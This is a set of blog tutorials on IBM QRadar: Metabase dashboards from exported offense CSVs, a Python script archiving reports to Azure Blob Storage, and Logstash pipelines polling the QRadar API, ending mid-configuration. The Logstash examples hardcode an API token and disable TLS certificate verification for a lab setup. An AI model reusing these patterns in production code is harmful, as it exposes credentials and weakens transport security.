Arjun

Qradar Dashboards Metabase

2023-10-16T00:00:00+00:00

Introduction

Have you ever wanted to quickly create an interactive QRadar Dashboard on a modern, open-source, self-service Business Intelligence (BI) tool?

In this step-by-step tutorial, we will learn how to leverage Metabase and its new CSV upload feature to import data exports from QRadar and create interactive Dashboards to gather valuable insights.

Note: This tutorial assumes you have admin access to a live QRadar deployment. For the purpose of this tutorial, I am using QRadar Community Edition. Please follow my step-by-step guide - How to install IBM QRadar CE V7.3.3 on VirtualBox to get a basic QRadar deployment up and running in your lab environment.

Pre-requisites

QRadar with admin access

I am using QRadar CE V7.3.3 as described above.
MySQL

I am using MySQL Ver 8.0.34 on a CentOS 7 Linux VM. For more information about installing MySQL 8.0 on your OS, please refer to MySQL Installation Guide.
Metabase Open Source Edition

I am using Metabase v0.47.2 on a CentOS 7 Linux VM. For more information about installing Metabase Open Source Edition on your OS, please refer to Metabase Open Source Edition.

Metabase

According to Metabase documentation:

Metabase is an open-source business intelligence tool. Metabase lets you ask questions about your data, and displays answers in formats that make sense, whether that’s a bar chart or a detailed table.

You can save your questions, and group questions into handsome dashboards. Metabase also makes it easy to share questions and dashboards with the rest of your team.

CSV Uploads on Metabase

According to Metabase documentation:

You can upload data in CSV format to Metabase and start asking questions about it. This feature is best suited for ad hoc analysis of spreadsheet data. If you have a lot of data, or will need to update or add to that data regularly, we recommend setting up a way to load that data into a database directly, then connecting Metabase to that database.

The above snippet from the documentation aptly summarizes the benefits and drawbacks of the CSV feature.

In the past, the only available option was to connect Metabase to a supported database. From our perspective, this means that we need to setup ETL (Extract-Transform-Load) pipelines to fetch data from QRadar (using REST APIs), perform transformations, and persist the transformed data into database tables.

Obviously, it is no simple feat to write, test, and maintain production-ready ETL pipelines. While it is still necessary for most reporting use cases, it is overkill for creating ad hoc Dashboards with quickly exported data. Hence, this new feature from Metabase is a blessing. It is similar to the functionality offered by other popular BI tools such as Power BI.

Note: Please refer to my blog post titled QRadar REST APIs with Logstash to learn how to develop ETL pipelines on Logstash to programatically fetch raw data from QRadar REST APIs, apply processing, and output into various formats and destinations.

Creating Dashboards

In this section, we will delve into the steps required to create our desired Dashboard on Metabase.

First, we will start by exporting the required CSV data from the QRadar Console. The next step involves configuring Metabase to accept CSV uploads. However, prior to enabling CSV uploads on Metabase, we need to create a new MySQL database and connect it to Metabase. Once the MySQL database is connected to Metabase, we can enable CSV uploads and choose the newly created database as the database to be used for uploads. Next, we will upload the exported QRadar CSV to Metabase as a Model. This step also involves configuring the appropriate column types. Finally, we will leverage the Model to ask Questions and create a new Dashboard with multiple metrics and visualizations.

Exporting QRadar Data

The first step involves exporting the necessary data from the QRadar Console. For the purpose of this tutorial, we will export Offenses from QRadar.

In the Offenses tab, the latest active Offenses are displayed. Click on Actions.

Under the Actions menu, select Export to CSV.

The export will commence. The duration of the export will be determined by the number of Offenses to be exported. Ensure your filters are appropriately set prior to initiating the export.

Download the compressed ZIP file to a local directory.

Unzip the compressed file to extract the CSV file.

For the sake of clarity, rename the CSV file to offenses.

Open the CSV file in Excel (or a text editor of your choice) to view its contents. Validate the columns and rows. The number of Offenses on the CSV file must match the number displayed on the Offenses tab on the QRadar Console.

Note: It is to be expected that the export will contain ALL the relevant columns pertaining to each Offense.

For the purpose of this tutorial, we will purge a couple of columns and retain only a few relevant ones.

Note: The retained columns are: id, magnitude, description, credibility, severity, relevance, eventCount, flowCount, attacker, target, formattedStartTime, formattedEndTime.

Configuring Metabase

With the Offenses exported from QRadar, the next step involves configuring Metabase to enable the CSV upload feature.

Configuring MySQL Database on Metabase

According to Metabase documentation:

There are a few things admins need to do to support CSV uploads:

Connect to a database using a database user account with write access. This way Metabase will be able to store the uploaded data somewhere.

Select the database and schema you want to store the uploaded data in.

Add people to a group with unrestricted data access to the upload schema database.

(Optional) specify a prefix for Metabase to prepend to the uploaded tables.

Essentially, this means that we need a database that will be used to store the uploaded CSV data. As mentioned in the pre-requisites, we have chosen MySQL. However, you can also choose PostgreSQL, which is the only other database that supports CSV uploads on Metabase.

To connect the MySQL database with Metabase, start by connecting to MySQL. I am using the MySQL client (mysql).

Create a new database called qradar using the command: CREATE DATABASE qradar;

Note: Use the SHOW DATABASES command to view the existing databases on MySQL.

Now that we have created the database on MySQL, the next step is to configure it on Metabase.

Click on Admin settings.

On the Admin settings page, click on the Databases tab.

On the Databases page, click on Add database.

On the Add databases page, populate the form with connection details to the MySQL database. Click on Save.

Note: It is pertinent to ensure that the connection details are accurate. We have used 127.0.0.1 since MySQL and Metabase are on the same CentOS 7 Linux VM. Depending on your setup, you may need to add/modify firewall rules to ensure connectivity.

If all goes well, a pop-up will appear on the bottom-right indicating that the database was added and synced successfully.

Configuring CSV Uploads on Metabase

Navigate back to the Admin settings page. Click on the Uploads tab on the left.

On the Uploads page, click on the Select a database dropdown.

Select QRadar_MySQL from the dropdown.

Once selected, an input box titled Upload Table Prefix (optional) will appear. Although it is optional, I have appended qradar for the sake of this tutorial. The Enable uploads button will now be enabled. Click on the button.

If all goes well, the button will turn green and display Uploads enabled. Exit the Admin settings page by clicking on Exit admin on the top-right.

Uploading CSVs to Metabase

The next step involves uploading the QRadar Offenses CSV to Metabase.

Navigate to the Metabase home page. Click on the meatballs menu (yes, it’s actually called meatballs menu) next to COLLECTIONS. Click on + New collection.

According to Metabase documentation:

Collections are the main way to organize questions, dashboards, and models. You can think of them like folders or directories. You can nest collections in other collections, and move collections around. One thing to note is that a single item, like a question or dashboard, can only be in one collection at a time (excluding parent collections).

Populate the New collection form with a Name and an optional Description. Click on Create.

The new collection is created. It is empty and is ready to be filled with Questions, Dashboards, Models, etc.

To upload the Offenses CSV file, click on the Upload data to QRadar icon on the top-right.

The file browser pop-up will open. Locate and select the offenses CSV file. Click on Open.

If all goes well, a pop-up will appear on the bottom-right indicating that the data was added to the QRadar collection.

A new Model, titled Offenses, will appear in the Collection. Click on it.

We can see our QRadar Offenses on Metabase. Great!

It is pertinent to validate the Model including the column types and formatting before building Dashboards. To delve into the Model, click on the meatballs menu on the right, and click on Edit metadata.

On this page, set the appropriate column type for each column. It is recommended to provide a description for each column to ensure better data governance.

Note: Set the column type for ID as Entity Key.

Once completed, click on Save changes.

The updated Model will be loaded.

Questions and Dashboards

The final step involves visualizing Questions and creating a Dashboard on Metabase.

Let us start with a simple metric (Question) - Number of Offenses.

To calculate this, we need to essentially perform a count operation. Click on Summarize.

By default, the metric is Count indicating the count of rows in the Model. Click on Done. Click on Save.

Let us save it as a new Question. Click on Save.

Populate the Save new question form with a Name and an optional Description. Click on Save.

Now, we want to add this newly created Question to a Dashboard. Click on Yes please! to proceed.

In the Add this question to a dashboard pop-up, select the QRadar Collection and click on + Create a new dashboard.

Populate the New dashboard form with a Name and an optional Description. Click on Create.

Visualize your data! This is where your creativity can shine.

Note: Please refer to this page from the Metabase documentation which explains in depth about the available visualization types and options.

For this metric (Number of Offenses), we have chosen a simple Number visualization, which looks like a scorecard.

According to Metabase documentation:

The Numbers option is for displaying a single number, nice and big.

The Dashboard is displayed. Let us add some more visualizations. To do this, you will need to create new Questions. Click on + New.

Click on Question.

Click on Models.

Select Offenses under QRadar.

Let us attempt another simple metric (Question) - Offenses by Magnitude.

To calculate this, we need to essentially perform a count operation followed by a group-by operation on the Magnitude column. Click on Visualize.

The screenshot below illustrates how we leverage the Metabase Notebook editor to calculate this metric (Question).

We have a table populated with the result. However, for the Dashboard, we would prefer a visualization. Click on Visualization on the bottom-left.

A bar chart typically works well to represent a simple distribution. Again, it’s completely your choice on what visualization to pick :) Click on Done.

Click on Save.

Populate the Save new question form with a Name and an optional Description. Click on Save.

Now, we want to add this newly created Question to a Dashboard. Click on Yes please! to proceed.

Select our existing SIEM Offenses Dashboard.

Add the visualization to the Dashboard. Click on Save.

Great! We now have two visualizations on our SIEM Offenses Dashboard. Feel free to come up with your own metrics (Questions) and add them to your Dashboard.

Here’s what my final Dashboard looks like!

Conclusion

In this tutorial, we learnt how to build a simple QRadar Dashboard on Metabase, an open-source BI tool, using its new CSV upload feature.

Metabase is a fantastic BI tool and the CSV upload feature is an absolute game changer. While it is still in its infancy, it seems promising for small SOC/SecOps teams to quickly visualize and create ad hoc Dashboards. That being said, for more resilient and automated reporting, the preferred approach should be to leverage ETL pipelines. With the right data engineering and architecture in place, Metabase can easily connect to your database/data warehouse and seamlessly refresh Dashboards.

It is to be noted that one of the biggest caveats of the CSV upload feature is to do with the CSV file size limit.

According to Metabase documentation:

CSV files cannot exceed 50 MB in size.

But, they have offered a workaround:

If you have a file larger than 200 MB, the workaround here is to:

Split the data into multiple files.

Upload those files one by one. Metabase will create a new model for each sheet.

Consolidate that data by creating a new question or model that joins the data from those constituent models created by each upload.

Using the concepts and steps from this tutorial, you can easily build sophisticated Dashboards with multiple Models representing various QRadar entities such as Offenses, Events, Rules and Networks. If you are limited by the GUI, you can always leverage the Metabase SQL editor. It is to be noted that Metabase does offer Pro and Enterprise versions of their software (cloud and on-prem options available). Depending on your requirements, you may either opt for the open-source version or a premium one.

I hope you enjoyed reading this tutorial. Please reach out if you have any questions or comments.

Useful Links

Qradar Reports

2022-12-16T00:00:00+00:00

Introduction

Have you ever wanted to download all your QRadar reports and store them in a centralized location? You could always use the QRadar UI and download each report manually. Instead, how about we automate this tedious task with a Python script?

In this tutorial, we will write a Python script to identify, parse, map, and upload QRadar reports from QRadar to Azure Blob Storage.

Note: This tutorial assumes you have admin access to a live QRadar deployment. For the purpose of this tutorial, I am using QRadar Community Edition. Please follow my step-by-step guide - How to install IBM QRadar CE V7.3.3 on VirtualBox to get a basic QRadar deployment up and running in your lab environment.

Note: This tutorial also assumes you have some experience with Microsoft Azure. This tutorial is not intended to be a deep-dive into Microsoft Azure and will not go into intricate details about the platform and its services. The aim is to leverage Azure Blob Storage as a means to store and organize QRadar reports. If you are new to Azure and Cloud Computing, please refer to Introduction to Azure fundamentals on Microsoft Learn.

Pre-requisites

QRadar with admin access

I am using QRadar CE V7.3.3 as described above.
Python 2.x.x

I am using Python 2.7.5 which comes installed by default on QRadar CE V7.3.3.
Microsoft Azure account

Reports in QRadar

According to IBM QRadar documentation:

You can use the Reports tab to create, edit, distribute, and manage reports. Detailed, flexible reporting options satisfy your various regulatory standards, such as PCI compliance. You can create your own custom reports or use default reports. You can customize and rebrand default reports and distribute these to other users.

Where are QRadar Reports stored?

In QRadar, reports are stored under /store/reporting/reports and are organized by user.

If we open the admin directory, we can see a directory called reports.

If we open the reports directory, there appears to be multiple directories within containing long names. But, what is the naming convention and where are the actual report files (PDF/HTML/XML/XLS) stored?

To answer the above questions, let us dissect the first directory name:

DAILY#^#admin#$#7eadb7c5-6b75-4c68-b317-56131e60aa6e#^#1658239353030

DAILY

It is clear that the first part of the directory name denotes the report schedule. The schedule can be one of DAILY, HOURLY, WEEKLY, MONTHLY, or MANUAL.

admin

The next part denotes the report owner. The owner will be one of the usernames on QRadar.

7eadb7c5-6b75-4c68-b317-56131e60aa6e

The next part denotes the report ID. This is a unique ID value assigned to a particular report regardless of factors such as schedule or owner.

1658239353030

The last part denotes the number of milliseconds since the Unix epoch when the report was generated.

If we open this directory, we can see some XML files, metadata files, and a directory called PDF.

Finally, if we open the PDF directory, we can see the actual PDF report document :)

Azure Blob Storage

According to Microsoft Azure documentation:

Azure Blob Storage is Microsoft’s object storage solution for the cloud. Blob Storage is optimized for storing massive amounts of unstructured data. Unstructured data is data that doesn’t adhere to a particular data model or definition, such as text or binary data.

Based on the above description, Azure Blob Storage seems like the perfect cloud-based solution to archive QRadar reports.

Note: You can leverage Amazon Simple Storage Service (Amazon S3) if your preferred Cloud Service Provider is AWS.

Blob Storage offers three types of resources:

The storage account

A container in the storage account

A blob in a container

_{Diagram from Microsoft}

Note: Please refer to Introduction to Azure Blob Storage to learn more about the Blob Storage concepts and terminology.

Configure Azure Blob Storage

Create Resource Group

The first step is to create a new resource group on the Azure Portal. As seen in the screenshot below, we create a new resource group called QRadar in the East US region. This resource group is the virtual container that will hold our storage account.

Create Storage Account

The next step is to create a new storage account within the QRadar resource group. As seen in the screenshot below, we create a new storage account called qradarreports with resource group as QRadar.

Note: Pay close attention to the redundancy option and select the best option by considering your availability requirements.

Create Container

The next step is to create a new container within the qradarreports storage account. As seen in the screenshot below, we create a new container called qradar-reports with access restricted to Private (no anonymous access).

Note: It is recommended to use restrict public access to ensure confidentiality of the data (QRadar reports with sensitive organization-specific information) being stored on Azure.

According to Microsoft Azure documentation:

When a container is configured for public access, any client can read data in that container. Public access presents a potential security risk, so if your scenario does not require it, we recommend that you disallow it for the storage account.

The newly created container qradar-reports is empty and does not contain any blobs.

Acquire Connection String

Earlier, we created our container qradar-reports with access restricted to Private (no anonymous access). This is a security feature that we enabled to ensure confidentiality of our QRadar reports. If we want to upload blobs to our container, we will need some mechanism of authentication.

According to Microsoft Azure documentation:

Every request made against a storage service must be authorized, unless the request is for a blob or container resource that has been made available for public or signed access. One option for authorizing a request is by using Shared Key.

As seen in the screenshot below, we can view and copy the Connection string (either one) for the qradarreports storage account from the Access keys tab.

Writing the Script

With an understanding of where and how reports are stored on QRadar, we can start writing a Python script to correctly identify, parse, map, and upload all reports to Azure Blob Storage.

Installing Azure Blob Storage Client Library for Python

The easiest way to interact with Azure via Python is by leveraging the Azure Blob Storage client library. The alternative is to DIY by making REST API requests to Azure. If you decide to go down that route, check out the Azure Blob Storage REST API documentation.

According to the project’s PyPI page:

The Azure Storage Blobs client library for Python allows you to interact with three types of resources: the storage account itself, blob storage containers, and blobs.

Now, the easiest way to install the library is by using pip - Python’s package installer. However, pip is not available by default on QRadar CE and requires manual installation.

To install pip, run the following commands in order:

wget https://bootstrap.pypa.io/get-pip.py
python get-pip.py

Note: Make sure QRadar has access to the Internet.

Basically, we download the get-pip.py using the wget utility and then execute the script. Check out this link for more information about installing pip.

Let us install the Azure Blob Storage client library for Python using pip:

pip install --ignore-installed azure-storage-blob

Identify, Parse and Map Reports

In the previous section, we learned that /store/reporting/reports/admin/reports is the deepest we can go on QRadar before each report is an individual directory whose name is composed of the report’s schedule, owner, time generated, and unique ID.

Now, a question arises - how can we identify the name of a QRadar report based on its ID?

Let us consider the previously discussed directory name as an example:

DAILY#^#admin#$#7eadb7c5-6b75-4c68-b317-56131e60aa6e#^#1658239353030

We identified that the unique report ID is 7eadb7c5-6b75-4c68-b317-56131e60aa6e. But, what is the name of this report?

To answer this question, we must look inside the report.properties file within the directory itself.

As seen in the above screenshot, the report name (or title) is Overview Report. This information is valuable to us for the purpose of archiving reports.

Hence, a good starting point is to write Python code to create a map of report IDs and report names.

We start by importing the required Python packages as seen below.

from os import listdir
from os.path import join, getsize, isdir
import re
from datetime import datetime
from azure.storage.blob import BlobServiceClient

The next step is to define some variables.

base_dir is the full path to the location of the reports on QRadar.

We will also define report_dirs which is an empty list to store the report directory names, and report_name_dir_mapping which is an empty dict to store the mapping between report IDs and report names.

base_dir = '/store/reporting/reports/admin/reports'
report_dirs = []
report_name_dir_mapping = {}

We will also define a string called AZ_CONN_STR which holds the connection string acquired in the Acquire Connection String section above.

AZ_CONN_STR = "DefaultEndpointsProtocol=https;AccountName=qradarreports;AccountKey=...........;EndpointSuffix=core.windows.net"
AZ_CONTAINER = "qradar-reports"

The next step is to actually create the mapping and populate report_name_dir_mapping.

In the first loop, we initialize report_name_dir_mapping with multiple children dict items. Each child dict has one key called “name” to contain the report name. It is initialized with an empty string.

In the second loop, we open the report.properties file within each report directory and populate the “name” key for each child dict with the report name (title) corresponding to the report ID.

for report_dir in filter(isdir,map(lambda s: join(base_dir,s), listdir(base_dir))):
    report_dirs.append(report_dir)
    report_id = report_dir.split("#")[4]
    name = ""
    report_name_dir_mapping[report_id] = {'name': name}

for report_dir in report_dirs:
    report_id = report_dir.split("#")[4]
    file_name = "%s/report.properties" % report_dir
    with open(file_name,"r") as f:
        raw_title = f.readlines()[1].strip()
        title = re.findall("(title=)(.*)", raw_title)[0][1]
    report_name_dir_mapping[report_id]['name'] = title

print(report_name_dir_mapping)

'''
{
  "542f895e-9051-4346-866d-b9ccbae8b9d6": {
    "name": "Offense Report"
  },
  "41f88f36-dd50-4ebe-b4d7-e05c23585c84": {
    "name": "Top Users by Remote Access Activity"
  },
  "7eadb7c5-6b75-4c68-b317-56131e60aa6e": {
    "name": "Overview Report"
  }
}
'''

Upload Reports to Azure

Now that we have created the mapping between report IDs and report names, the next step is to upload each report to Azure using the Azure Blob Storage client library.

We will implement three versions (functions) to organize reports in different styles on Azure Blob Storage.

In version 1, we will simply upload all the PDF report documents to the qradar-reports container on Azure Blob Storage.

In version 2, we will organize reports into folders and sub-folders based on the year, month, and day in an hierarchical manner within the qradar-reports container on Azure Blob Storage.

In version 3, we will organize reports into folders based on the report name within the qradar-reports container on Azure Blob Storage.

Note: You can easily modify these functions to create your own style.

Version 1 - All reports in one container

In this version, we start by creating an object of BlobServiceClient called blob_service_client. We then use blob_service_client and its method get_blob_client to initialize a client to represent the blob, which is synonymous with the report PDF. We provide the container name and blob name (report name) as parameters.

Then, we leverage the exists() function to check if the blob already exists. Essentially, we are checking if the report PDF was already uploaded or not. If it exists, we exit the function. If it does not exist, we upload the report PDF and print the returned metadata.

def upload_to_azure(file_name, new_file_name):
    blob_service_client =  BlobServiceClient.from_connection_string(AZ_CONN_STR)
    blob_client = blob_service_client.get_blob_client(container=AZ_CONTAINER,blob=new_file_name)
    if blob_client.exists() == True:
      return "Blob (%s) already exists (skipping)" % new_file_name
    with open(file_name, "rb") as data:
        upload_metadata = blob_client.upload_blob(data)
    return "Uploaded %s" % new_file_name, upload_metadata, "\n"

Version 2 - Reports organized by year, month, and day

This version is a modification of the one above. The main difference is that we extract the year, month, and day using the datetime.strptime function. Thanks to this useful tip for pointing out that we can create hierarchies on Azure Blob Storage by using “/” as a separator. In our case, the blob naming convention would be “///.pdf”.

def upload_to_azure_dt(file_name, new_file_name):
    report_dt = datetime.strptime(new_file_name.split(" ")[0],"%Y-%m-%d")
    report_year = report_dt.year
    report_month = report_dt.month
    report_day = report_dt.day
    new_file_name_dt = "%s/%s/%s/%s" % (report_year,report_month,report_day,new_file_name)
    blob_service_client =  BlobServiceClient.from_connection_string(AZ_CONN_STR)
    blob_client = blob_service_client.get_blob_client(container=AZ_CONTAINER,blob=new_file_name_dt)
    if blob_client.exists() == True:
      return "Blob (%s) already exists (skipping)" % new_file_name
    with open(file_name, "rb") as data:
        upload_metadata = blob_client.upload_blob(data)
    return "Uploaded %s" % new_file_name, upload_metadata, "\n"

Version 3 - Reports organized by name

Like above, this version is also a modification of version 1. The main difference is that we extract the report name using string manipulation techniques. Here, the blob naming convention would be “/.pdf”.

def upload_to_azure_report_name(file_name, new_file_name):
    report_name = ' '.join(new_file_name.split(' ')[2:])[:-4]
    new_file_name_report = "%s/%s" % (report_name,new_file_name)
    blob_service_client =  BlobServiceClient.from_connection_string(AZ_CONN_STR)
    blob_client = blob_service_client.get_blob_client(container=AZ_CONTAINER,blob=new_file_name_report)
    if blob_client.exists() == True:
      return "Blob (%s) already exists (skipping)" % new_file_name
    with open(file_name, "rb") as data:
        upload_metadata = blob_client.upload_blob(data)
    return "Uploaded %s" % new_file_name, upload_metadata, "\n"

Executing the Script

To execute the script, we simply need to iterate through each report directory stored in the report_dirs list. Then, we use various string manipulation and datetime functions to extract the report’s unique ID and time generated. With the extracted fields, we construct the required file name (or blob name). Finally, we invoke the three Azure upload functions with the required parameters.

for report_dir in report_dirs:
    report_id = report_dir.split("#")[4]
    report_gen = report_dir.split("#")[6]
    report_gen_dt = datetime.fromtimestamp(int(report_gen)/1000.0)
    report_gen_dt_str = report_gen_dt.strftime("%Y-%m-%d %H:%M:%S")
    file_name = "%s/PDF/%s.pdf" % (report_dir,report_id)
    new_file_name = "%s %s.pdf" % (report_gen_dt_str, report_name_dir_mapping[report_id]["name"])
    # version 1
    print(upload_to_azure(file_name, new_file_name))
    # version 2
    print(upload_to_azure_dt(file_name, new_file_name))
    # version 3
    print(upload_to_azure_report_name(file_name, new_file_name))

Version 1 on Azure

After executing the Python script, we can see that all the QRadar reports were successfully uploaded to the qradar-reports container.

Version 2 on Azure

After executing the Python script, we can see that the qradar-reports container has a new folder called 2022, corresponding to the year that all the QRadar reports were generated.

If we open 2022, we can see two folders - 7 and 9, corresponding to the months of July 2022 and September 2022 respectively.

If we open 7, we can see two folders - 19 and 21, corresponding to the days the QRadar reports were generated in July 2022.

If we open 21, we can see that the QRadar reports generated on 21st July 2022 were successfully uploaded.

Version 3 on Azure

After executing the Python script, we can see that the qradar-reports container has three new folders - Offense Report, Overview Report, and Top Users by Remote Access Activity, corresponding to the unique report titles of the QRadar reports.

If we open Overview Report, we can see that all the QRadar reports (with title = Overview Report) were successfully uploaded.

Conclusion

In this tutorial, we learnt how to archive QRadar reports to Azure Blob Storage using Python. To summarize:

We started by discussing where and how reports are stored and organized in QRadar. We also dissected the directory naming convention employed by QRadar for each report.

On the Azure Portal, we configured Azure Blob Storage to serve as a storage location for the QRadar reports. We started by creating a resource group on the Azure Portal, which is a virtual container for storing related resources. Next, we created a storage account and tied it with the newly created resource group. Then, we created a container within the newly created storage account, which is where the blobs (QRadar reports) would reside. Finally, we acquired a connection string to programmatically authenticate to and interact with the storage account.

Then, we began our journey to write the Python script.

First, we installed the Azure Blob Storage Client Library for Python, which is a Python library to interact with the Azure Blob Storage service without having to recreate essential functionality. Next, we discussed how to identify the name (title) of a QRadar report based on its ID by searching inside the report.properties file within each report directory. Based on this understanding, we implemented Python code to achieve the mapping. Next, we discussed and implemented 3 unique versions of organizing QRadar reports on Azure Blob Storage:

Version 1 - All reports in one container
Version 2 - Reports organized by year, month, and day
Version 3 - Reports organized by name

Finally, we executed the script by iterating through each report directory and visualized the output of each version on Azure.

Using the concepts and example code from this tutorial, you can easily write your own scripts to archive QRadar reports to Azure or another Cloud Service Provider for long-term storage.

I hope you enjoyed reading this tutorial. Please reach out if you have any questions or comments.

Complete Code

You can download the Python script from GitHub below. To execute the script, run:

python qradar-reports-azure-blob.py

Note: Make sure you edit line number 11 and paste your own valid connection string. Check above on how to acquire the connection string.

Note: Make sure you install the Azure Blob Storage Client Library for Python as explained above.

Qradar Logstash

2022-07-14T00:00:00+00:00

Introduction

In this tutorial, we will learn how to build ETL pipelines using Logstash to programmatically fetch raw data from QRadar REST APIs, apply processing, and output into various formats and destinations.

Note: This tutorial assumes you have admin access to a live QRadar deployment. For the purpose of this tutorial, I am using QRadar Community Edition. Please follow my step-by-step guide - How to install IBM QRadar CE V7.3.3 on VirtualBox to get a basic QRadar deployment up and running in your lab environment.

Note: This tutorial also assumes you have some experience with Logstash. Please refer to A Practical Introduction to Logstash for a quick refresher.

Pre-requisites

QRadar with admin access

I am using QRadar CE V7.3.3 as described above.
QRadar API Token

On QRadar, the API Token is also known as a SEC Token and must be generated by the admin on the QRadar Console. Please refer here for a quick walkthrough.
Logstash

I am using Logstash 8.1.3 on a CentOS 7 Linux VM.

For more information about installing Logstash on your OS, please refer to Installing Logstash.
Elasticsearch

I am using Elasticsearch 8.3.2 on a CentOS 7 Linux VM.

For more information about installing Elasticsearch on your OS, please refer to Installing Elasticsearch.
MongoDB

I am using MongoDB Community Edition 5.0.8 on a CentOS 7 Linux VM.

For more information about installing MongoDB Community Edition on your OS, please refer to Install MongoDB Community Edition.
MongoDB output plugin for Logstash

Install the plugin using the logstash-plugin utility:

/usr/share/logstash/bin/logstash-plugin install --version=3.1.5 logstash-output-mongodb

Note: I installed version 3.1.5 as I came across a known bug with the latest version. Your mileage may vary. Please review the plugin’s GitHub repo prior to installation and usage.

ETL & Logstash

According to IBM:

ETL, which stands for extract, transform and load, is a data integration process that combines data from multiple data sources into a single, consistent data store that is loaded into a data warehouse or other target system.

ETL provides the foundation for data analytics and machine learning workstreams. Through a series of business rules, ETL cleanses and organizes data in a way which addresses specific business intelligence needs, like monthly reporting, but it can also tackle more advanced analytics, which can improve back-end processes or end user experiences.

Why would we need to perform ETL operations on QRadar data?

One common use-case is to build reports and dashboards on external Business Intelligence (BI) tools and platforms. While QRadar comes with in-built reporting and dashboarding capabilities, it is often desirable to fuse and correlate data from various sources to generate further insights. In a SOC, this is typically done manually by harnessing reports generated by multiple systems (such as SIEM, SOAR, EDR, and Vulnerability Management, among many others). This can easily become a tiresome and repetitive approach to SOC reporting, especially when the same reports and dashboards must be produced and delivered on a daily, weekly, and/or monthly basis.

With a well-defined, automated approach to reporting in place, SOC teams can spend their focus on other critical activities, such as writing better detection rules, fine-tuning, and troubleshooting. This is where Logstash comes in.

According to Elastic:

Logstash is a free and open server-side data processing pipeline that ingests data from a multitude of sources, transforms it, and then sends it to your favorite “stash.”

By leveraging the capabilities of Logstash, we can easily fetch data from QRadar, dynamically transform as per our reporting requirements, and output into a variety of destinations (including files and databases).

Logstash Pipeline Configuration

According to Logstash documentation:

The Logstash event processing pipeline has three stages: inputs → filters → outputs. Inputs generate events, filters modify them, and outputs ship them elsewhere. Inputs and outputs support codecs that enable you to encode or decode the data as it enters or exits the pipeline without having to use a separate filter.

Example #1: QRadar Rules to STDOUT

We will start with a simple goal to retrieve all the Rules deployed on QRadar and print them out to the standard output (STDOUT).

Input

Our goal in the input stage is to fetch raw JSON data from the QRadar Rules REST API endpoint. This involves making an HTTP request to the QRadar Console by supplying a valid SEC Token as a Header parameter. To achieve this, we will leverage the Logstash Http_poller input plugin.

Note: Unlike the MongoDB output plugin, the Http_poller input plugin is available by default and does not require manual installation.

Note: Use the command /usr/share/logstash/bin/logstash-plugin list to display all the installed plugins.

input {
        http_poller 
        {
            schedule => { cron => "* * * * *" }
            ssl_verification_mode => "none"
            urls => {
                qradar_rules_url => {
                    method => get
                    url => "https://192.168.56.144/api/analytics/rules"
                    headers => {
                        SEC => "4150d602-11ba-4d55-b3de-b6ebfe8b93ac"
                    }
                }
            }
        }
}

Let us go line-by-line in the above snippet and discuss the various configuration options.

schedule is specified to indicate how often Logstash polls the given URL. In the above snippet, we have used { cron => "* * * * *" } which indicates that Logstash must poll the QRadar Rules API endpoint URL once every minute.
ssl_verification_mode is specified to indicate if Logstash must verify the server certificates. In the above snippet, we have used "none" which indicates that Logstash must not perform verification of the QRadar Console certificate. To ensure better security, it is recommended to enable this option in production environments.
urls is specified to describe the URLs and their associated options. It is important to note that multiple URLs can be specified in one configuration file, if desired. Each URL specified in the configuration file requires a "name" which can be used to distinguish the outputs. In the above snippet, we have one URL configuration (qradar_rules_url) in which we specify method as get, url as "https://192.168.56.144/api/analytics/rules", and headers as { SEC => "4150d602-11ba-4d55-b3de-b6ebfe8b93ac" }.

Note: The complete QRadar API URL is provided on the QRadar Interactive API Documentation page corresponding to the endpoint.

Filter

Our goal in the filter stage is to limit the fields that are returned by the QRadar REST API endpoint. To achieve this, we will leverage the Prune filter plugin.

filter {
        prune {
            whitelist_names => ["^id$","^name$","^creation_date$","^enabled$"]
        }
}

whitelist_names is specified to indicate the fields that must be included in the output event. It is to be noted that the field names must be mentioned as an array of regular expressions. In the above snippet, we have specified the id, name, creation_date, and enabled fields to be included in the output event.

Note: Please refer to this section about the QRadar Rules API endpoint in my blog post titled QRadar REST APIs with Python to learn more about the QRadar Rules API endpoint including its returned fields, parameters, and JSON response.

Note: You can also choose to leverage the whitelist_values, blacklist_names, and blacklist_values configuration options.

Output

Our goal in the output stage is to simply print the processed event to the standard output (STDOUT). To achieve this, we will leverage the Stdout output plugin.

output {
        stdout {}
}

Although not specified in the above snippet, we can specify the codec configuration option to encode the output event accordingly. The default value is rubydebug.

Running the Configuration

We can combine the above snippets to create the below configuration file.

input {
        http_poller 
        {
            schedule => { cron => "* * * * *" }
            ssl_verification_mode => "none"
            urls => {
                qradar_rules_url => {
                    method => get
                    url => "https://192.168.56.144/api/analytics/rules"
                    headers => {
                        SEC => "4150d602-11ba-4d55-b3de-b6ebfe8b93ac"
                    }
                }
            }
        }
}
filter {
        prune {
            whitelist_names => ["^id$","^name$","^creation_date$","^enabled$"]
        }
}
output {
        stdout {}
}

As mentioned in the Specifying Pipelines section in A Practical Introduction to Logstash:

The easiest way to start Logstash is to have Logstash create a single pipeline based on a single configuration file that we specify through the -f command line parameter.

Assuming the above configuration file is saved as qradar-rules.conf, we can run it with Logstash using the command:

logstash -f /root/logstash-blog/qradar-rules.conf

Note: Please ensure that you specify the full path to the .conf file. By default, Logstash will attempt to find the .conf file in /usr/share/logstash/.

Note: If logstash is not found in the path, try using /usr/share/logstash/bin/logstash instead.

The output from Logstash is seen below. The output has been truncated considering the number of lines required to represent all the Rules.

{
               "id" => 100295,
             "name" => "Local L2R LDAP Server Scanner",
          "enabled" => true,
    "creation_date" => 1146812962422
}
{
               "id" => 100296,
             "name" => "First-Time User Access to Critical Asset",
          "enabled" => true,
    "creation_date" => 1440696183560
}
{
               "id" => 100297,
             "name" => "Malware or Virus Clean Failed",
          "enabled" => true,
    "creation_date" => 1280932510492
}
{
               "id" => 100302,
             "name" => "Excessive Failed Logins to Compliance IS",
          "enabled" => false,
    "creation_date" => 1123776255889
}
{
               "id" => 100303,
             "name" => "Auditing Services Changed on Compliance Host",
          "enabled" => false,
    "creation_date" => 1279294472002
}
.
.
.

This approach of using STDOUT as the output destination is valuable when developing and debugging Logstash configurations.

Example #2: QRadar Log Sources to MongoDB

In the previous section, we managed to make an API request to fetch QRadar Rules, whitelist required fields, and output to STDOUT.

In this section, we will take it a step further. Here, our goal is to fetch and persist all the Log Sources on QRadar as BSON documents within a MongoDB database collection.

Input

Our goal in the input stage is to fetch raw JSON data from the QRadar Log Sources REST API endpoint. Similar to the previous example, we will leverage the Logstash Http_poller input plugin to make an HTTP request to the QRadar Console by supplying a valid SEC Token as a Header parameter.

input {
        http_poller
        {
            schedule => { cron => "* * * * *" }
            ssl_verification_mode => "none"
